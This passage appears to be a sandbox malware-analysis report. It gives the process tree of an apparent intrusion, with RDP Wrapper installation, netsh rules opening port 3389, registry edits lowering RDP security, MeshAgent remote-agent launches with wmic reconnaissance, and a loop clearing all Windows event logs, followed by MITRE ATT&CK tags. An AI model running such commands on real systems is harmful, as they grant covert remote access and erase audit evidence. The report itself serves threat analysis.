      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:2392
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4928
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:4304
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:4548
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
      4⤵
      PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
      4⤵
      PID:468
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        
        PID:3032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
      4⤵
      PID:4936
    - - C:\Windows\system32\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        5⤵
        
        PID:4052
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.4474" /f
      4⤵
      PID:1076
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.19041.4474]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4560
  - - C:\Windows\system32\PING.EXE
      ping -n 1 google.com
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:2608
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:2176
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2016
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:816
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:3360
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4408
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:1980
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:2204
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.19041.4474]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:2292
  - - C:\Windows\system32\PING.EXE
      ping -n 1 google.com
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:1620
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:2180
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:388
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4736
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:748
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2916
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:640
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:1440
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.19041.4474]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:1976
- C:\Windows\system32\cmd.exe
  cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
  2⤵
  PID:4004

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3276
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4496
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1996
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:936
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3856
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3212

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4192
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1992
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4272
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4992
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3280
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4364

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4072
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1988
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1156
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1140
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1360
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:4840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:3820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:4460

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1240
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1736
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:4956
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3980
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4252
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:1008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:1424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:560

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4148
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1996
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4028
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2392
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2576
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:1188

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1180
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3252
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:4584
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:3668
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:1532
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4940

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4696
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2700
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4448
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2564
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3220
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4372

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:928

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2940
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:3980
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4024
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:4376
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4300
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:3140

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4052
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4564
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2416
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4776
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:4844
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2628

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1464
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:412
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2840
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:4980
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2424
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2360

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1852
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1096
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:1804
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:3304
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2984
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1052
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4272

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2080
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1104
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3896
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:4040
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3928
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2188
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4020

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4148
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:1512
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2600
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry